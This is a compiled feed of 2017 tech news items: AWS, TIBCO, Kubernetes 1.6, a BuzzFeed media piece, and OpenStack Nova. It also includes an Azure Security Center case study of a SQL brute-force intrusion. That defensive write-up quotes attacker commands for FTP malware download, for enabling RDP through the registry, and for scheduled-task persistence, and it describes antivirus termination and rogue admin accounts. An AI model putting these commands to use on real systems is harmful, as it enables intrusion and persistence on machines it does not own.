AWS Database Migration Service Adds Amazon Simple Storage Service (S3) as a Target

AWS Database Migration Service (DMS) has added Amazon Simple Storage Service (S3) as a migration target. Amazon S3 is object storage with a simple web interface to store and retrieve any amount of data. Together, the two products give you the ability to extract information from any database supported by DMS and write it to Amazon S3 in a format that can be used by almost any application.
Quelle: aws.amazon.com

TIBCO DataSynapse launches its Cloud Adapter for autoscaling in Azure

Since our launch of the TIBCO DataSynapse GridServer Engine image in the Azure Marketplace back in August, we have continued to pursue feature updates that improve the integration and experience of scheduling jobs and tasks into Azure. With the increased regulatory requirements of the Fundamental Review of the Trade Book (FRTB), having the ability to burst into Azure for the use of additional compute capacity is a hot topic within the Financial Services industry.

This week, TIBCO DataSynapse released the High Performance Adapter (HPCCA) to extend the functionality of GridServer 6.2.0 and enable customers to temporarily increase their compute capacity in the cloud.

The hybrid burst scenario takes a step forward with the ability to dynamically create and provision both Linux and Windows VMs directly into Azure. By implementing HPCCA as a Manager Hook into the Broker, it is able to review Broker events and take the right course of action through a simple cloud management algorithm.

Based on the number of events experienced, a formula predicts the number of VMs required and a customer created image is initiated. HPCCA can configure the current deployment and remote-start the Engine Daemons ready to process these events.

HPCCA also has the ability to shut down the Engine Daemons as soon as the events begin to decrease. By utilizing the same set of Azure APIs, the Engine idle time following event execution triggers this action.

If you would like to hear more about this and you based in the New York City area, please join us Wednesday, April 19th at the Microsoft office to view a demonstration.

Register now for the TIBCO and Microsoft Azure Workshop!

TIBCO DataSynapse GridServer is a service execution platform for dynamically scaling any application at any time across grid infrastructure. Due to its improvement in productivity, performance and uptime it is used heavily within Financial Services for parallel computing certain risk applications.
Quelle: Azure

Kubernetes 1.6: Multi-user, Multi-workloads at Scale

Today we’re announcing the release of Kubernetes 1.6.In this release the community’s focus is on scale and automation, to help you deploy multiple workloads to multiple users on a cluster. We are announcing that 5,000 node clusters are supported. We moved dynamic storage provisioning to stable. Role-based access control (RBAC), kubefed, kubeadm, and several scheduling features are moving to beta. We have also added intelligent defaults throughout to enable greater automation out of the box.What’s NewScale and Federation: Large enterprise users looking for proof of at-scale performance will be pleased to know that Kubernetes’ stringent scalability SLO now supports 5,000 node (150,000 pod) clusters. This 150% increase in total cluster size, powered by a new version of etcd v3 by CoreOS, is great news if you are deploying applications such as search or games which can grow to consume larger clusters.For users who want to scale beyond 5,000 nodes or spread across multiple regions or clouds, federation lets you combine multiple Kubernetes clusters and address them through a single API endpoint. In this release, the kubefed command line utility graduated to beta – with improved support for on-premise clusters. kubefed now automatically configures kube-dns on joining clusters and can pass arguments to federated components.Security and Setup: Users concerned with security will find that RBAC, now beta adds a significant security benefit through more tightly scoped default roles for system components. The default RBAC policies in 1.6 grant scoped permissions to control-plane components, nodes, and controllers. RBAC allows cluster administrators to selectively grant particular users or service accounts fine-grained access to specific resources on a per-namespace basis. RBAC users upgrading from 1.5 to 1.6 should view the guidance here. Users looking for an easy way to provision a secure cluster on physical or cloud servers can use kubeadm, which is now beta. kubeadm has been enhanced with a set of command line flags and a base feature set that includes RBAC setup, use of the Bootstrap Token system and an enhanced Certificates API.Advanced Scheduling: This release adds a set of powerful and versatile scheduling constructs to give you greater control over how pods are scheduled, including rules to restrict pods to particular nodes in heterogeneous clusters, and rules to spread or pack pods across failure domains such as nodes, racks, and zones.Node affinity/anti-affinity, now in beta, allows you to restrict pods to schedule only on certain nodes based on node labels. Use built-in or custom node labels to select specific zones, hostnames, hardware architecture, operating system version, specialized hardware, etc. The scheduling rules can be required or preferred, depending on how strictly you want the scheduler to enforce them.A related feature, called taints and tolerations, makes it possible to compactly represent rules for excluding pods from particular nodes. The feature, also now in beta, makes it easy, for example, to dedicate sets of nodes to particular sets of users, or to keep nodes that have special hardware available for pods that need the special hardware by excluding pods that don’t need it.Sometimes you want to co-schedule services, or pods within a service, near each other topologically, for example to optimize North-South or East-West communication. Or you want to spread pods of a service for failure tolerance, or keep antagonistic pods separated, or ensure sole tenancy of nodes. Pod affinity and anti-affinity, now in beta, enables such use cases by letting you set hard or soft requirements for spreading and packing pods relative to one another within arbitrary topologies (node, zone, etc.).Lastly, for the ultimate in scheduling flexibility, you can run your own custom scheduler(s) alongside, or instead of, the default Kubernetes scheduler. Each scheduler is responsible for different sets of pods. Multiple schedulers is beta in this release. Dynamic Storage Provisioning: Users deploying stateful applications will benefit from the extensive storage automation capabilities in this release of Kubernetes.Since its early days, Kubernetes has been able to automatically attach and detach storage, format disk, mount and unmount volumes per the pod spec, and do so seamlessly as pods move between nodes. In addition, the PersistentVolumeClaim (PVC) and PersistentVolume (PV) objects decouple the request for storage from the specific storage implementation, making the pod spec portable across a range of cloud and on-premise environments. In this release StorageClass and dynamic volume provisioning are promoted to stable, completing the automation story by creating and deleting storage on demand, eliminating the need to pre-provision.The design allows cluster administrators to define and expose multiple flavors of storage within a cluster, each with a custom set of parameters. End users can stop worrying about the complexity and nuances of how storage is provisioned, while still selecting from multiple storage options.In 1.6 Kubernetes comes with a set of built-in defaults to completely automate the storage provisioning lifecycle, freeing you to work on your applications. Specifically, Kubernetes now pre-installs system-defined StorageClass objects for AWS, Azure, GCP, OpenStack and VMware vSphere by default. This gives Kubernetes users on these providers the benefits of dynamic storage provisioning without having to manually setup StorageClass objects. This is a change in the default behavior of PVC objects on these clouds. Note that default behavior is that dynamically provisioned volumes are created with the “delete” reclaim policy. That means once the PVC is deleted, the dynamically provisioned volume is automatically deleted so users do not have the extra step of ‘cleaning up’.In addition, we have expanded the range of storage supported overall including:ScaleIO Kubernetes Volume Plugin enabling pods to seamlessly access and use data stored on ScaleIO volumes.Portworx Kubernetes Volume Plugin adding the capability to use Portworx as a storage provider for Kubernetes clusters. Portworx pools your server capacity and turns your servers or cloud instances into converged, highly available compute and storage nodes.Support for NFSv3, NFSv4, and GlusterFS on clusters using the COS node image Support for user-written/run dynamic PV provisioners. A golang library and examples can be found here.Beta support for mount options in persistent volumesContainer Runtime Interface, etcd v3 and Daemon set updates: while users may not directly interact with the container runtime or the API server datastore, they are foundational components for user facing functionality in Kubernetes’. As such the community invests in expanding the capabilities of these and other system components.The Docker-CRI implementation is beta and is enabled by default in kubelet. Alpha support for other runtimes, cri-o, frakti, rkt, has also been implemented.The default backend storage for the API server has been upgraded to use etcd v3 by default for new clusters. If you are upgrading from a 1.5 cluster, care should be taken to ensure continuity by planning a data migration window. Node reliability is improved as Kubelet exposes an admin configurable Node Allocatable feature to reserve compute resources for system daemons.Daemon set updates lets you perform rolling updates on a daemon setAlpha features: this release was mostly focused on maturing functionality, however, a few alpha features were added to support the roadmapOut-of-tree cloud provider support adds a new cloud-controller-manager binary that may be used for testing the new out-of-core cloud provider flowPer-pod-eviction in case of node problems combined with tolerationSeconds, lets users tune the duration a pod stays bound to a node that is experiencing problemsPod Injection Policy adds a new API resource PodPreset to inject information such as secrets, volumes, volume mounts, and environment variables into pods at creation time.Custom metrics support in the Horizontal Pod Autoscaler changed to use Multiple Nvidia GPU support is introduced with the Docker runtime onlyThese are just some of the highlights in our first release for the year. For a complete list please visit the release notes.CommunityThis release is possible thanks to our vast and open community. Together, we’ve pushed nearly 5,000 commits by some 275 authors. To bring our many advocates together, the community has launched a new program called K8sPort, an online hub where the community can participate in gamified challenges and get credit for their contributions. Read more about the program here.Release ProcessA big thanks goes out to the release team for 1.6 (lead by Dan Gillespie of CoreOS) for their work bringing the 1.6 release to light. This release team is an exemplar of the Kubernetes community’s commitment to community governance. Dan is the first non-Google release manager and he, along with the rest of the team, worked throughout the release (building on the 1.5 release manager, Saad Ali’s, great work) to uncover and document tribal knowledge, shine light on tools and processes that still require special permissions, and prioritize work to improve the Kubernetes release process. Many thanks to the team.User AdoptionWe’re continuing to see rapid adoption of Kubernetes in all sectors and sizes of businesses. Furthermore, adoption is coming from across the globe, from a startup in Tennessee, USA to a Fortune 500 company in China. JD.com, one of China’s largest internet companies, uses Kubernetes in conjunction with their OpenStack deployment. They’ve move 20% of their applications thus far on Kubernetes and are already running 20,000 pods daily. Read more about their setup here. Spire, a startup based in Tennessee, witnessed their public cloud provider experience an outage, but suffered zero downtime because Kubernetes was able to move their workloads to different zones. Read their full experience here.“With Kubernetes, there was never a moment of panic, just a sense of awe watching the automatic mitigation as it happened.”Share your Kubernetes use case story with the community here.AvailabilityKubernetes 1.6 is available for download here on GitHub and via get.k8s.io. To get started with Kubernetes, try one of the these interactive tutorials. Get InvolvedCloudNativeCon + KubeCon in Berlin is this week March 29-30, 2017. We hope to get together with much of the community and share more there!Share your voice at our weekly community meeting: Post questions (or answer questions) on Stack Overflow Follow us on Twitter @Kubernetesio for latest updatesConnect with the community on SlackMany thanks for your contributions and advocacy!– Aparna Sinha, Senior Product Manager, Kubernetes, Google
Quelle: kubernetes

Pro-Trump Media Has A New Obsession: The White House Briefing Room

Pro-Trump Media Has A New Obsession: The White House Briefing Room

Lee Stranahan / Via youtube.com

Following Trump administration Press Secretary Sean Spicer&;s pledge to establish a White House press corps with voices “outside of Washington”, a number of unabashedly Trump-friendly news outlets have made the pilgrimage to the west wing briefing room — the symbolic heart of the establishment. Their goal: to bring their anti-elite, pro-Trump, and occasionally trollish brand of coverage to the White House.

For some of these self-described “real news” outlets and personalities, landing a seat in the White House briefing room is vindication of their often sensational and semi-factual 2016 presidential campaign stories which some believe undermined the candidacy of Hillary Clinton and helped propel Trump to the Oval Office. For others, it’s a chance to ask questions the mainstream media won’t touch. And for many, there’s a singular benefit worth the trip to Washington alone: the exposure that comes from seeing and being seen on the highest rated show on daytime TV.

“The briefing room has become a piece of pop culture for this generation and the people who followed the election every day on TV and are now glued to the day-to-day,” one newer White House correspondent told BuzzFeed News. For the reporter, being in the room brings with it the intoxicating proposition of asking a question that could set news cycle for the day — or the week. “And so it&039;s definitely an opportunity for far-right, crazy blogosphere types to make a name for themselves. It’s that way for anyone new but definitely true for the far-right guys. Everyone’s watching.”

“It&039;s definitely an opportunity for far-right, crazy blogosphere types to make a name for themselves.”

For Jim Hoft and Lucian Wintrich of the far-right blog Gateway Pundit, a short time in the briefing room has generated enormous returns. Hoft, Gateway Pundit’s founder, announced Wintrich’s White House correspondent position at ‘The Deploraball’ the night before Trump was sworn in as president. Since then, the 28- year old Wintrich has been the focus of dozens of articles (one by this writer), the star of a documentary film, and last week, the subject of a lengthy New Yorker profile. Earlier this month, he was the alleged victim of an altercation inside the briefing room involving Fox Radio’s John Decker, who, according to Wintrich and a few observers, openly chastised Gateway Pundit as a racist, xenophobic outlet. The incident — the details of which are disputed by both parties — was partially witnessed and tweeted by the well-followed members of the White House press corps, written up in a variety of publications, and outrage-shared across the pro-Trump internet, casting Wintrich among the far-right as the heroically aggrieved party, just trying to do his job.

But Wintrich has yet to ask a question of Spicer. Instead, he’s opted to “feel out the room” and “learn the protocols” before jumping in. “If you see pictures of me on Twitter in the briefing room. I’m literally squeezed in the corner taking notes,” he told BuzzFeed News.

The daily briefing spectacle has caught the eye of non-Washington types like New Right blogger and Twitter personality, Mike Cernovich, who lives in California. “It&039;s so good for your brand to be in the room now because it still seems like this prestigious place,” he told BuzzFeed News. “That&039;s why the press corps is losing it — White House access is a major status thing and now it feels like everyone&039;s able to do it.”.

While Spicer’s briefings may appear more open to the media’s fringes, the truth is, the briefing has never been overly exclusive. Day passes for a trip to the press room require little more effort than submitting some personal information to the White House (caveat: full-time “hard passes” are much harder to obtain). Cernovich said he has tentative plans to try and drop by a briefing sometime in April. Last week on Twitter he asked his followers, “should I get a White House pass?” (again, it doesn’t quite work that way, but the sentiment suggests he wants to show up). Responses ranged from “Light eradicates darkness. DO IT&;” to “I think we should revoke CNN&039;s and give it to you.”

The conspiracy and pro-Trump news site Infowars has deftly injected itself into the Beltway news cycle multiple times without even stepping into the briefing room. In February, Infowars’ founder Alex Jones posted a video falsely claiming he’d secured White House press credentials from the Trump administration. Jones subsequently walked back that claim, explaining he’d simply taken initial steps to secure credentials. Then, in late January, Jones hired former World Net Daily writer and fellow conspiracy theorist, Jerome Corsi to head up an Infowars Washington bureau. In early February, Corsi tweeted that the White House had told him it “didn’t think there would be any problem in Infowars and Alex Jones and me getting press credentials.”

Two weeks ago, Lauren Southern, a controversial far-right Canadian media personality, made her way to DC to attend a White House briefing, where she tweeted a selfie with the caption, “Independent media takeover.” The tweet ricocheted around the internet; for pro-Trumpers it was another win for the unsung voices of “new media.” Southern — known for her previous denunciations of both rape culture and popular feminism— showing up in the briefing room registered to some as alarming breach. A few hours after posting the selfie, Media Matters ran a story with the headline, “Meet Lauren Southern, The Latest “Alt-Right” Media Troll To Gain Access To The White House Press Briefing.” The story called Southern “just the latest of the fringe, sycophantic “alt-right” media personalities that the White House is letting into its press briefings.”

Southern said she decided to show up in the room after Wintrich’s confrontation. “I heard there was hostility towards new media in the briefing room and wanted to see the experience for myself,” she told BuzzFeed News, adding that she intends to return “in order to ask questions the MSM won&039;t touch.”

The new prestige of the White House briefing room reverses decades of decline. For years the role of White House correspondent had gradually shifted from being central in journalism to one that many reporters dreaded as being captive to unresponsive, low level aides while big stories broke across the internet and elsewhere. As such, tensions over briefing room access have flared in the early weeks of Trump’s presidency. A number of reporters for mainstream outlets have voiced public concerns on Twitter over Spicer and President Trump’s penchant for calling on conservative media outlets during press conferences.

This month, after a reporter for the Heritage Foundation’s Daily Signal served as the press pool reporter for a Vice Presidential event, the Washington Post’s Paul Farhi questioned partisanship’s role in the White House press corps in an article headlined, “What’s a legitimate news outlet? A new face in the White House press pool raises questions.” And in a recent New Yorker article, White House correspondents and camera crew from legacy news outlets were quoted sniping at the new publications that have popped up in the briefing room. In one instance a radio correspondent was overheard bemoaning that, “at best, they don’t know what they’re doing…at worst, you wonder whether someone is actually feeding them softball questions.”

The prickly reception given to White House briefing room newcomers isn’t exactly unprecedented. At his first press conference in 2009, President Obama’s decision to call on The Huffington Post’s Sam Stein prompted a mini news cycle of its own. In 2009, Time Magazine described Obama’s decision as such: “the whole White House media shop, has crossed a Rubicon of sorts, acknowledging the equivalent legitimacy of an unapologetically unobjective media outlet, which lives nowhere but the Internet and which didn&039;t even exist four years ago”

At the time, New York Times White House reporter, Peter Baker called the decision to add partisan-leaning blogs to the press corps “troubling,” arguing that “We’re blurring the line between news and punditry even further and opening ourselves to legitimate questions among readers about where the White House press corps gets its information.” It’s a position Baker still appears to hold today; this month he told the told The Daily Signal that the issue has only grown murkier. “It becomes harder to draw lines now and say this organization is acceptable and this one is not,” he wrote.

Multiple self-professed members of pro-Trump outlets told BuzzFeed News their welcome to the room by more established outlets was less than friendly — “there’s a palpable tension there,” Wintrich told BuzzFeed News. While two other White House correspondents said allegations of a freeze-out were “overblown.” The discrepancy likely results from the spectrum of conservative outlets and reporters in the Trump press room. While some, like Wintrich and Gateway Pundit delight in trolling, plenty of reporters from right-leaning new media outlets try to play it straight and push the administration on claims like wiretapping and Russian interference in the election. “Plenty of those guys come from conservative outlets but still show up everyday ready to do the hard work like everyone else,” one White House correspondent said.

“They&039;re playing right into our fucking hands — it&039;s ridiculous.”

Regardless, the perceived tension and occasional hand-wringing from mainstream media is having the — perhaps unintended — consequence of elevating the profiles of the new faces in the room. The trolls, in essence, have been fed.

“They&039;re playing right into our fucking hands — it&039;s ridiculous,” Wintrich said describing the reaction to the briefing room altercation a few weeks ago. “So many members of conservative media after this happened reached out all supportive and told me how unfair the situation was. That&039;s street cred for me.” For Southern, the reaction from places like Media Matters is what will keep her coming back to the press room. “I literally just stood there and this was their reaction? I look forward to seeing the collective meltdown when I actually get a question in,” she said.

“I think members of the media are doing a disservice to themselves by putting so much attention on people who don&039;t report each day from the White House and use the briefing to bring attention to themselves,” one White House reporter said. “The Gateway Pundit situation was an ordeal and all but at the end of the day I don&039;t know I’ve ever read anything by [Wintrich]. So why not just ignore it?” In Southern’s case, Cernovich agrees. “They&039;re so triggered by the presence of people like Wintrich that they made him into an overnight sensation. He got the mainstream media to troll themselves.”

Quelle: <a href="Pro-Trump Media Has A New Obsession: The White House Briefing Room“>BuzzFeed

AWS CloudFormation Supports Authoring Templates with Code References and Amazon VPC Peering

You can now simplify your AWS CloudFormation template authoring by inserting references to existing CloudFormation templates using Include Transform. Transforms are declarative statements within CloudFormation templates that instruct CloudFormation how to process your template. Include Transform instructs CloudFormation on where in the main template to inject CloudFormation templates snippets stored in S3 buckets. For example, you can maintain your commonly used resource definitions as template snippets and use Include Transform to retrieve and include them into your main template to create or update stacks. Visit here to learn more.
Quelle: aws.amazon.com

How Azure Security Center helps reveal a Cyberattack

The Azure Security Center (ASC) analysts team reviews and investigates ASC alerts to gain insight into security incidents affecting Microsoft Azure customers, helping improve Azure Security alerts and detections. ASC helps customers keep pace with rapidly evolving threats by using advanced analytics and global threat intelligence.

Although we have come a long way as far as cloud security is concerned, even today security factors are heavily discussed as companies consider moving their assets to the cloud. The Azure Security Center team understands how critical it is for our customers to be assured that their Azure deployments are secure, not only from advanced attacks but even from the ones that are not necessarily new or novel. The beauty of ASC lies in its simplicity. Although ASC uses machine learning, anomaly detection, and behavioral analysis to determine suspicious events, it still addresses simple things like SQL brute force attacks that Bad Guys/Script Kiddies are using to break into Microsoft SQL servers.

In this blog, we’ll map out the stages of one real-world attack campaign that began with a SQL Brute Force attack, which was detected by the Security Center, and the steps taken to investigate and remediate the attack. This case study provides insights into the dynamics of the attack and recommendations on how to prevent similar attacks in your environment.

Initial ASC alert and details

Hackers are always trying to target internet connected databases. There are tons of bad guys trying to discover IP addresses that have SQL Server running so that they can crack their password through a brute force attack. The SQL database can contain a wealth of valuable information for the attackers, including personally identifiable information, credit card numbers, intellectual property, etc. Even if the database doesn’t have much information, a successful attack on an insecurely configured SQL installation can be leveraged to get full system admin privileges.

Our case started with an ASC Alert notification to the customer detailing malicious SQL activity. A command line “ftp -s:C:zyserver.txt” launched by the SQL service account was unusual and flagged as by ASC Alerts.

The alert provided details such as date and time of the detected activity, affected resources, subscription information, and included a link to a detailed report of the detected threat and recommended actions.

 

 

Through our monitoring, the ASC analysts team was also alerted to this activity and looked further into the details of the alert. What we discovered was the SQL service account (SQLSERVERAGENT) was creating FTP scripts (i.e.: C:zyserver.txt), which was used to download and launch malicious binaries from an FTP site.

The initial compromise

A deeper investigation into the affected Azure subscription began with inspection of the SQL error and trace logs where we found indications of SQL Brute Force attempts. In the SQL error logs, we encountered hundreds of “Audit Login Failed” logon attempts for the SQL Admin ‘sa’ account (built-in SQL Server Administration) which eventually led up to a successful login.

These brute force attempts occurred over TCP port 1433, which was exposed on a public facing interface. TCP port 1433 is the default port for SQL Server.

Note: It is a very common recommendation to change the SQL default port 1433, this may impart a “false sensation of security”, because many port scanning tools can scan a “range” of network ports and eventually find SQL listening on ports other than 1433.

Once the SQL Admin ‘sa’ account was compromised by brute force, the account was then used to enable the ‘xp_cmdshell’ extended stored procedure as we’ve highlighted below in a SQL log excerpt.

The ‘xp_cmdshell’ stored procedure is disabled by default and is of particular interest to attackers because of its ability to invoke a Windows command shell from within Microsoft SQL Server. With ‘xp_cmdshell enabled, the attacker created SQL Agent jobs which invoked ‘xp_cmdshell’ and launched arbitrary commands, including the creation and launch of FTP scripts which, in turn, downloaded and ran malware.

Details of malicious activity

Once we determined how the initial compromise occurred, our team began analyzing Process Creation events to determine other malicious activity. The Process Creation events revealed the execution of a variety of commands, including downloading and installing backdoors and arbitrary code, as well as permission changes made on the system.

Below we have detailed a chronological layout of process command lines that we determined to be malicious:

A day after the initial compromise we began to see the modification of ACLS on files/folders and registry keys with use of Cacls.exe (which appears to have been renamed to osk.exe and vds.exe).

Note: Osk.exe is the executable for the Accessibility On-Screen Keyboard and Vds.exe is the Virtual Disk Service executable, both typically found on a Windows installation. The command lines and command switches detailed below, however, are not used for Osk.exe or VDS.exe and are associated with Cacls.exe.

The Cacls.exe command switches /e /g is used to grant the System account full(:f) access rights to ‘cmd.exe’ and ‘net.exe’.

A few seconds later, we see the termination of known Antivirus Software using the Windows native “taskkill.exe”.

This was followed by the creation of and FTP script (c:zyserver.txt ) which was flagged in the original ASC Alert. This FTP script appears to download malware (c:stserver.exe) from a malicious FTP site and subsequently launch the malware.

A few minutes later, we see the “net user” and “net localgroup” commands used to accomplish the following:

a.    Activate the built-in guest account and add it to the Administrators group

b.   Create a new user account and add the newly created user to the Administrators group

A little over 2 hours later, we see the regini.exe command which appears to be used to create, modify, or delete registry keys. Regini can also set permissions on the registry keys as defined in the noted .ini file. We then see, regsvr32.exe silently (/s switch) registering dlls related to the Windows shell (urlmon.dll, shdocvw.dll) and Windows scripting (jscript.dll, vbscript.dll, wshom.ocx).

This is immediately followed by additional modification of permissions on various Windows executables. Essentially resetting each to default with the “icacls.exe” command.

Note: The /reset switch replaces ACLs with default inherited ACLs for all matching files.

Lastly, we observed the deletion of “Terminal Server” fDenyTSConnections registry key. This is a registry key that contains the configuration of Terminal Server connection restrictions. This led us to believe that malicious RDP connections may be the next step for the attacker to access the server. Inspection of logon events did not reveal to us any malicious RDP attempts or connections, however:

Disabling of Terminal Server connection restrictions by overwriting values in the “Terminal Server” registry key
reg.exe ADD "HKLMSYSTEMCurrentControlSetControlTerminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f" 

We also noticed and Scheduled task created. This task referenced a binary named “svhost.exe” to be launched out of the C:RECYCLER folder, which is suspicious.

Note that the legitimate “svchost.exe” files located in the “WindowsSystem32” and “WindowssysWOW64”. Svchost.exe running from any other directory should be considered suspicious.

Persistence mechanism – Task Scheduler utility (schtasks.exe) used to set a recurring task
C:WindowsSystem32schtasks.exe /create /tn "45645" /tr "C:RECYCLERsvchost.exe" /sc minute /mo 1 /ru "system 

Recommended remediation and mitigation steps

Once we understood the extent and the details of the attack, we recommended the following remediation and mitigation steps to be taken.

First, if possible, we first recommended the backup and rebuild the SQL Server and reset all user accounts. We then implement the following mitigation steps to help prevent further attacks.

1. Disable ‘sa’ account and use the more secure Windows Authentication

To disable ‘sa’ login via SQL, run the following commands as a sys admin

ALTER LOGIN sa DISABLE

GO

2. To help prevent attackers from guessing the ‘sa’ account, rename the ‘sa’ account
To rename the ‘sa’ account via SQL, run the following as a sys admin:

ALTER LOGIN sa WITH NAME = [new_name];

GO

3. To prevent future brute force attempts, change and harden the ‘sa’ password and set the sa Login to ‘Disabled’.

Learn how to verify and change the system administrator password in MSDE or SQL Server 2005 Express Edition.

4. It’s also a good idea to ensure that ‘xp_cmdshell’ is disabled. Again, note that this should be disabled by default.

5. Block port TCP port 1433 if it is not needed be opened to the internet. From your Azure Portal, take the following steps to configure a Rule to block 1433 in Network Security Group

a. Open the Azure portal

b. Navigate to > (More Services) -> Network security groups

c. If you have opted into the Network Security option, you will see an entry for <ComputerName-nsg> — click it to view your Security Rules

d. Under Settings click "Inbound security rules" and then click +Add on the next pane

e. Enter the Rule name and Port information.Under the ‘Service’ pulldown, choose MS SQL and it will automatically select Port range = 1433 as detailed below.

f. Then apply the newly created rule to the subscription

6. Inspect all stored procedures that may have been enabled in SQL and look for stored procedures that may be implementing ‘xp_cmdshell’ and running unusual command.

For example, in our case, we identified the following commands:

7. Lastly, we highly recommend configuring Azure subscription(s) to receive future alerts and email notifications from Microsoft Azure Security Center. To receive alerts and email notifications of security issues like this in the future, we recommended upgrading from ASC “Free” (basic detection) tier to ASC “Standard” (advanced detection) tier.

Below is an example of the email alert received from ASC when this SQL incident was detected:

Learn more about SQL detection

Azure SQL Database Threat Detection–Advanced DB Security in the Cloud
Protect Azure SQL Databases with Azure Security Center
SQL Threat Detection – Your built-in security expert

Quelle: Azure

Stephen Finucane – OpenStack Nova – What’s new in Ocata

At the OpenStack PTG in February, Stephen Finucane speaks about what’s new in Nova in the Ocata release of OpenStack.

Stephen: I’m Stephen Finucane, and I work on Nova for Red Hat.

I’ve previously worked at Intel. During most of my time working on Nova I’ve been focused on the same kind of feature set, which is what Intel liked to call EPA – Enhanced Platform Awareness – or NFV applications. Making Nova smarter from the perspective of Telco applications. You have all this amazing hardware, how do you expose that up and take full advantage of that when you’re running virtualized applications?

The Ocata cycle was a bit of an odd one for me, and probably for the project itself, because it was really short. The normal cycle runs for about six months. This one ran for about four.

During the Ocata cycle I actually got core status. That was probably as a result of doing a lot of reviews. Lot of reviews, pretty much every waking hour, I had to do reviews. And that was made possible by the fact that I didn’t actually get any specs in for that cycle.

So my work on Nova during that cycle was mostly around reviewing Python 3 fixes. It’s still very much a community goal to get support in Python 3. 3.5 in this case. Also a lot of work around improving how we do configuration – making it so that administrators can actually understand what different knobs and dials Nova exposes, what they actually mean, and what the implications of changing or enabling them actually are.

Both of these have been going in since before the Ocata cycle, and we made really good progress during the Ocata cycle to continue to get ourselves 70 or 80% of the way there, and in the case of config options, the work is essentially done there at this point.

Outside of that, the community as a whole, most of what went on this cycle was again a continuation of work that has been going on the last couple cycles. A lot of focus on the maturity of Nova. Not so much new features, but improving how we did existing features. A lot of work on resource providers, which are a way that we can keep track of the various resources that Nova’s aware of, be they storage, or cpu, or things like that.

Coming forward, as far as Pike goes, it’s still very much up in the air. That’s what we’re here for this week discussing. There would be, from my perspective, a lot of the features that I want to see, doubling down on the NFV functionality that Nova supports. Making things
like SR-IOV easier to use, and more performant, where possible. There’s also going to be some work around resource providers again for SR-IOV and NFV features and resources that we have.

The other stuff that the community is looking at, pretty much up in the air. The idea of exposing capabilities, something that we’ve had a lot of discussion about already this week, and I epxect we’ll have a lot more. And then, again, evolution of the Nova code base – what more features the community wants, and various customers want – going and providing those.

This promises to be a very exciting cycle, on account of the fact that we’re back into the full six month mode. There’s a couple of new cores on board, and Nova itself is full steam ahead.
Quelle: RDO